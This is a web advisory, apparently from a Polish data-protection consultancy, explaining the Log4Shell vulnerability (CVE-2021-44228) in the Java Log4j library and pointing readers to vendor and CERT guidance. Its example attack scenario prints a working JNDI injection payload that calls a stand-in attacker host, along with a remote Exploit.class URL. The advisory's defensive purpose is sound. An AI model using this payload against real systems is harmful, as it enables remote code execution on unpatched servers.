ODO24 Logo
ODO24 Logo
ODO24 Logo
GDPR questions and answers

GDPR: QUESTIONS AND ANSWERS

Category:
IT Security

Critical vulnerability in the popular Java library – Log4j

ANSWER

A group of developers within the LunaSec platform discovered a serious vulnerability in the popular Java logging library Log4j. The critical vulnerability is: CVE-2021-44228 (Log4Shell), which allows remote code execution. This library is one of the most widely used event-logging libraries for applications written in Java.

It should be noted that a very large number of commercial applications – from companies such as Apple, Amazon, Elastic, Steam, and Twitter – use this library, meaning the likelihood of this vulnerability posing a threat to an organisation is high. The vulnerability allows remote code execution with the privileges of the affected application, for example a web server using Log4j. Exploitation is straightforward. Growing traffic associated with scanning internet-facing services and attempts to exploit the vulnerability has also been observed.

An example attack scenario may unfold as follows:

  1. An application logs events using the Apache Log4j library – for instance, failed user login attempts – recording user-controlled values such as a username or email address.
  2. An attacker attempts to log in, supplying a malicious payload as the username, e.g.: ${jndi:ldap://sample_domain.com/a} (where sample_domain.com is a server controlled by the attacker).
  3. The Log4j vulnerability is triggered by the payload, and the server sends a request to attacker_domain.com via the Java Naming and Directory Interface (JNDI).
  4. The response contains a path to a remote Java class file (e.g. http://test.sample_domain.com/Exploit.class), which is injected into the server process.
  5. The injected payload enables the attacker to execute arbitrary code.

It should be noted that the attack vector is not limited solely to web applications. Any application using the Apache Log4j library is potentially vulnerable if it logs user-controlled values. For example, if an application processes email headers or DNS query data using this library, that system may also be at risk.

Many vendors have already issued their own recommendations and warnings. These can be found on manufacturers’ websites, or by consulting the community-maintained list of links: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

Additional information on how attacks work and how to defend against them is also published by security-focused websites:

  1. https://sekurak.pl/krytyczna-podatnosc-w-log4j-co-wiemy-jak-wygladaja-ataki-jak-sie-chronic-cve-2021-44228-rce/
  2. https://cert.pl/posts/2021/12/krytyczna-podatnosc-w-bibliotece-apache-log4j/
Show all
PreviousNext

Read also:

07 June 2026

Przygotuj się na atak phishingowy, nim będzie za późno

07 June 2026

TikTok a RODO w sektorze publicznym – czego urzędy mogą dowiedzieć się z niemieckich zaleceń dla instytucji

02 June 2026

Czy do spełnienia wymogów ustawy o krajowym systemie cyberbezpieczeństwa (KSC / NIS2) potrzebne jest Security Operations Center (SOC)?

RODO Migawki

Bezpłatny e-learning dla pracowników

Receive a free package of 4 tutorials and 4 e-learning trainings
The controller of your data is ODO 24 sp. z o. o.
Critical vulnerability discovered in Java library Log4j: CVE-2021-44228 | ODO 24 | ODO 24